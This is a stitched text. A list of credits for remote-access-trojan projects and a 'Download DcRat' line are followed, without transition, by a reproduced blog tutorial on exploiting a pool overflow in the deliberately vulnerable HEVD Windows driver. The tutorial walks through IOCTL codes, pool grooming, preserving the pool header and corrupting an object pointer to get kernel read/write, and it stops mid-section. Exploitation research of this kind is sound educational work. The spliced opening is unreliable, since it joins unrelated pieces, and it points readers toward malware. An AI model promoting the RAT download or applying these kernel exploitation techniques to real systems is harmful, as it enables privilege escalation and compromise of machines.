Lime-RAT - @NYAN-x-CAT
vanillarat - @dannythesloth
StreamLibrary - @Rut0
SharpChromium- @djhohnstein
AForge.NET - @andrewkirillov
AsyncRAT - @NYAN-x-CAT
SimpleMsgPack.Net - @ymofen
SharpSploit - @cobbr
and some other projects

Download DcRat

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 2

Connor McGarr

18 July 2021 at 00:00

Introduction

This blog serves as Part 2 of a two-part series about pool corruption in the age of the segment heap on Windows. Part 1, which can be found here starts this series out by leveraging an out-of-bounds read vulnerability to bypass kASLR from low integrity. Chaining this information leak vulnerability with the bug outlined in this post, which is a pool overflow leading to an arbitrary read/write primitive, we will close out this series by outlining why pool corruption in the age of the segment heap has had the scope of techniques, in my estimation, lessened from the days of Windows 7.

Due to the release of Windows 11 recently, which will have Virtualization-Based Security (VBS) and Hypervisor Protected Code Integrity (HVCI) enabled by default, we will pay homage to page table entry corruption techniques to bypass SMEP and DEP in the kernel with the exploit outlined in this blog post. Although Windows 11 will not be found in the enterprise for some time, as is the case with rolling out new technologies in any enterprise - vulnerability researchers will need to start moving away from leveraging artificially created executable memory regions in the kernel to execute code to either data-only style attacks or to investigate more novel techniques to bypass VBS and HVCI. This is the direction I hope to start taking my research in the future. This will most likely be the last post of mine which leverages page table entry corruption for exploitation.

Although there are much better explanations of pool internals on Windows, such as this paper and my coworker Yarden Shafir’s upcoming BlackHat 2021 USA talk found here, Part 1 of this blog series will contain much of the prerequisite knowledge used for this blog post - so although there are better resources, I urge you to read Part 1 first if you are using this blog post as a resource to follow along (which is the intent and explains the length of my posts).

Vulnerability Analysis

Let’s take a look at the source code for BufferOverflowNonPagedPoolNx.c in the win10-klfh branch of HEVD, which reveals a rather trivial and controlled pool-based buffer overflow vulnerability.

The first function within the source file is TriggerBufferOverflowNonPagedPoolNx. This function, which returns a value of type NTSTATUS, is prototyped to accept a buffer, UserBuffer and a size, Size. TriggerBufferOverflowNonPagedPoolNx invokes the kernel mode API ExAllocatePoolWithTag to allocate a chunk from the NonPagedPoolNx pool of size POOL_BUFFER_SIZE. Where does this size come from? Taking a look at the very beginning of BufferOverflowNonPagedPoolNx.c we can clearly see that BufferOverflowNonPagedPoolNx.h is included.

Taking a look at this header file, we can see a #define directive for the size, which is determined by a processor directive to make this variable 16 on a Windows 64-bit machine, which we are testing from. We now know that the pool chunk that will be allocated from the call to ExAllocatePoolWithTag within TriggerBufferOverfloowNx is 16 bytes.

The kernel mode pool chunk, which is now allocated on the NonPagedPoolNx is managed by the return value of ExAllocatePoolWithTag, which is KernelBuffer in this case. Looking a bit further down the code we can see that RtlCopyMemory, which is a wrapper for a call to memcpy, copies the value UserBuffer into the allocation managed by KernelBuffer. The size of the buffer copied into KernelBuffer is managed by Size. After the chunk is written to, based on the code in BufferOverflowNonPagedPoolNx.c, the pool chunk is also subsequently freed.

This basically means that the value specified by Size and UserBuffer will be used in the copy operation to copy memory into the pool chunk. We know that UserBuffer and Size are baked into the function definition for TriggerBufferOverflowNonPagedPoolNx, but where do these values come from? Taking a look further into BufferOverflowNonPagedPoolNx.c, we can actually see these values are extracted from the IRP sent to this function via the IOCTL handler.

This means that the client interacting with the driver via DeviceIoControl is able to control the contents and the size of the buffer copied into the pool chunk allocated on the NonPagedPoolNx, which is 16 bytes. The vulnerability here is that we can control the size and contents of the memory copied into the pool chunk, meaning we could specify a value greater than 16, which would write to memory outside the bounds of the allocation, a la an out-of-bounds write vulnerability, known as a “pool overflow” in this case.

Let’s put this theory to the test by expanding upon our exploit from part one and triggering the vulnerability.

Triggering The Vulnerability

We will leverage the previous exploit from Part 1 and tack on the pool overflow code to the end, after the for loop which does parsing to extract the base address of HEVD.sys. This code can be seen below, which sends a buffer of 50 bytes to the pool chunk of 16 bytes. The IOCTL for to reach the TriggerBufferOverflowNonPagedPool function is 0x0022204b

After this allocation is made and the pool chunk is subsequently freed, we can see that a BSOD occurs with a bug check indicating that a pool header has been corrupted.

This is the result of our out-of-bounds write vulnerability, which has corrupted a pool header. When a pool header is corrupted and the chunk is subsequently freed, an “integrity” check is performed on the in-scope pool chunk to ensure it has a valid header. Because we have arbitrarily written contents past the pool chunk allocated for our buffer sent from user mode, we have subsequently overwritten other pool chunks. Due to this, and due to every chunk in the kLFH, which is where our allocation resides based on heuristics mentioned in Part 1, being prepended with a _POOL_HEADER structure - we have subsequently corrupted the header of each subsequent chunk. We can confirm this by setting a breakpoint on on call to ExAllocatePoolWithTag and enabling debug printing to see the layout of the pool before the free occurs.

The breakpoint set on the address fffff80d397561de, which is the first breakpoint seen being set in the above photo, is a breakpoint on the actual call to ExAllocatePoolWithTag. The breakpoint set at the address fffff80d39756336 is the instruction that comes directly before the call to ExFreePoolWithTag. This breakpoint is hit at the bottom of the above photo via Breakpoint 3 hit. This is to ensure execution pauses before the chunk is freed.

We can then inspect the vulnerable chunk responsible for the overflow to determine if the _POOL_HEADER tag corresponds with the chunk, which it does.

After letting execution resume, a bug check again incurs. This is due to a pool chunk being freed which has an invalid header.

This validates that an out-of-bounds write does exist. The question is now, with a kASLR bypass in hand - how to we comprehensively execute kernel-mode code from user mode?

Exploitation Strategy

Fair warning - this section contains a lot code analysis to understand what this driver is doing in order to groom the pool, so please bear this in mind.

As you can recall from Part 1, the key to pool exploitation in the age of the segment heap it to find objects, when exploiting the kLFH specifically, that are of the same size as the vulnerable object, contain an interesting member in the object, can be called from user mode, and are allocated on the same pool type as the vulnerable object. We can recall earlier that the size of the vulnerable object was 16 bytes in size. The goal here now is to look at the source code of the driver to determine if there isn’t a useful object that we can allocate which will meet all of the specified parameters above. Note again, this is the toughest part about pool exploitation is finding objects worthwhile.

Luckily, and slightly contrived, there are two files called ArbitraryReadWriteHelperNonPagedPoolNx.c and ArbitraryReadWriteHelperNonPagedPoolNx.h, which are useful to us. As the name can specify, these files seem to allocate some sort of object on the NonPagedPoolNx. Again, note that at this point in the real world we would need to reverse engineer the driver and look at all instances of pool allocations, inspect their arguments at runtime, and see if there isn’t a way to get useful objects on the same pool and kLFH bucket as the vulnerable object for pool grooming.

ArbitraryReadWriteHelperNonPagedPoolNx.h contains two interesting structures, seen below, as well several function definitions (which we will touch on later - please make sure you become familiar with these structures and their members!).

As we can see, each function definition defines a parameter of type PARW_HELPER_OBJECT_IO, which is a pointer to an ARW_HELP_OBJECT_IO object, defined in the above image!

Let’s examine ArbitraryReadWriteHelpeNonPagedPoolNx.c in order to determine how these ARW_HELPER_OBJECT_IO objects are being instantiated and leveraged in the defined functions in the above image.

Looking at ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see it contains several IOCTL handlers. This is indicative that these ARW_HELPER_OBJECT_IO objects will be sent from a client (us). Let’s take a look at the first IOCTL handler.

It appears that ARW_HELPER_OBJECT_IO objects are created through the CreateArbitraryReadWriteHelperObjectNonPagedPoolNxIoctlHandler IOCTL handler. This handler accepts a buffer, casts the buffer to type ARW_HELP_OBJECT_IO and passes the buffer to the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Let’s inspect CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

CreateArbitraryReadWriteHelperObjectNonPagedPoolNx first declares a few things:

A pointer called Name
A SIZE_T variable, Length
An NTSTATUS variable which is set to STATUS_SUCCESS for error handling purposes
An integer, FreeIndex, which is set to the value STATUS_INVALID_INDEX
A pointer of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, called ARWHelperObject, which is a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we saw previously defined in ArbitraryReadWriteHelperNonPagedPoolNx.h.

The function, after declaring the pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX previously mentioned, probes the input buffer from the client, parsed from the IOCTL handler, to verify it is in user mode and then stores the length specified by the ARW_HELPER_OBJECT_IO structure’s Length member into the previously declared variable Length. This ARW_HELPER_OBJECT_IO structure is taken from the user mode client interacting with the driver (us), meaning it is supplied from the call to DeviceIoControl.

Then, a function called GetFreeIndex is called and the result of the operation is stored in the previously declared variable FreeIndex. If the return value of this function is equal to STATUS_INVALID_INDEX, the function returns the status to the caller. If the value is not STATUS_INVALID_INDEX, CreateArbitraryReadWriteHelperObjectNonPagedPoolNx then calls ExAllocatePoolWithTag to allocate memory for the previously declared PARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointer, which is called ARWHelperObject. This object is placed on the NonPagedPoolNx, as seen below.

After allocating memory for ARWHelperObject, the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then allocates another chunk from the NonPagedPoolNx and allocates this memory to the previously declared pointer Name.

This newly allocated memory is then initialized to zero. The previously declared pointer, ARWHelperObject, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT, then has its Name member set to the previously declared pointer Name, which had its memory allocated in the previous ExAllocatePoolWithTag operation, and its Length member set to the local variable Length, which grabbed the length sent by the user mode client in the IOCTL operation, via the input buffer of type ARW_HELPER_OBJECT_IO, as seen below. This essentially just initializes the structure’s values.

Then, an array called g_ARWHelperOjbectNonPagedPoolNx, at the index specified by FreeIndex, is initialized to the address of the ARWHelperObject. This array is actually an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, and managed such objects. This is defined at the beginning of ArbitraryReadWriteHelperNonPagedPoolNx.c, as seen below.

Before moving on - I realize this is a lot of code analysis, but I will add in diagrams and tl;dr’s later to help make sense of all of this. For now, let’s keep digging into the code.

Let’s recall how the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function was prototyped:

NTSTATUS
CreateArbitraryReadWriteHelperObjectNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
);

This HelperObjectIo object is of type PARW_HELPER_OBJECT_IO, which is supplied by a user mode client (us). This structure, which is supplied by us via DeviceIoControl, has its HelperObjectAddress member set to the address of the ARWHelperObject previously allocated in CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. This essentially means that our user mode structure, which is sent to kernel mode, has one of its members, HelperObjectAddress to be specific, set to the address of another kernel mode object. This means this will be bubbled back up to user mode. This is the end of the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function! Let’s update our code to see how this looks dynamically. We can also set a breakpoint on HEVD!CreateArbitraryReadWriteHelperObjectNonPagedPoolNx in WinDbg. Note that the IOCTL to trigger CreateArbitraryReadWriteHelperObjectNonPagedPoolNx is 0x00222063.

We know now that this function will allocate a pool chunk for the ARWHelperObject pointer, which is a pointer to an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on the call to ExAllocatePoolWIthTag responsible for this, and enable debug printing.

Also note the debug print Name Length is zero. This value was supplied by us from user mode, and since we instantiated the buffer to zero, this is why the length is zero. The FreeIndex is also zero. We will touch on this value later on. After executing the memory allocation operation and inspecting the return value, we can see the familiar Hack pool tag, which is 0x10 bytes (16 bytes) + 0x10 bytes for the _POOL_HEADER_ structure - making this a total of 0x20 bytes. The address of this ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is 0xffff838b6e6d71b0.

We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, there is always a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT created. We know there is also an array of these objects created and the created object for each given CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        //
        // Get a free index
        //

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
        {
            //
            // Failed to get a free index
            //

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;
        }

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

Create a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT object called ARWHelperObject
Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which has a value of 0
Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
Assign this object to an array which manages all active PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT objects
Return the address of the ARWHelpeObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let’s take a look at what this function will do with our input buffer. Recall last time we were able to specify the length that was used in the operation on the size of the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

A pointer named Name
A pointer named HelperObjectAddress
An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
An NTSTATUS code

After these values are declared, This function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, The Name member, which is a pointer, from this user mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT ARWHelperObject, is extracted and stored into the declared HelperObjectAddress at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept a value of any pointer, but realistically this is used for a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snipped of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since all g_ARWHelperObjectNonPagedPoolNx is at the end of the day is an array, of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has it’s Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag by using the specified Length of our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is a one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address and the call to ProbeForRead will not be able to locate this address. Instead, let’s create a user-mode pointer and leverage it instead!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here however is that the value we can overwrite, which is ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that after the IOCL call to reach GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since the HelperObjectAddress is pointing to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExAllocateFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which also is allocated by ExAllocatePoolWithTag is freed.

Now that we know all of the ins-and-outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case. Leveraging a disassembler make take a bit more time to come to the same conclusions we were able to come to).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

“Fill the holes” in the current page servicing allocations of size 0x20
Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs we can make sure when the header is overwritten it is overwritten with the same content as before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that at the time of the overflow into the next chunk, which should be into one of these ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed, the first 0x10 bytes that are overflown of this chunk, which will be the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX’s _POOL_HEADER, will be preserved and kept as valid, bypassing the earlier issue shown when an invalid header occurs.

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

fillHoles()
groomPool()
pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here, is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the mempcy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, which is used in the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation to clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header. Since we are in the kLFH, we can just hardcode the pool header, as we have proven, to satisfy the pool and to avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, we can corrupt the first 0x10 bytes of the value in RCX, which is the destination address in the memory copy operation, because there are 0x20 bytes in the “vulnerable” pool chunk (which is used in the copy operation). The first 0x10 bytes are the header and the second half we actually don’t care about, as we are worried about corrupting an adjacent chunk. Because of this, we can set the first 0x10 bytes of our copy, which writes out of bounds, to 0x10 to ensure that the bytes which are copied out of bounds are the bytes that comprise the pool header of the next chunk.

We have now successfully performed out out-of-bounds write via a pool overflow, and have corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member, which is dynamically allocated on the pool before had and has an address we do not control, unless we use a vulnerability such as an out-of-bounds write, with an address we do control, which is the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone ARE_HELPER_OBJECT_NON_PAGED_POOL_NX object.

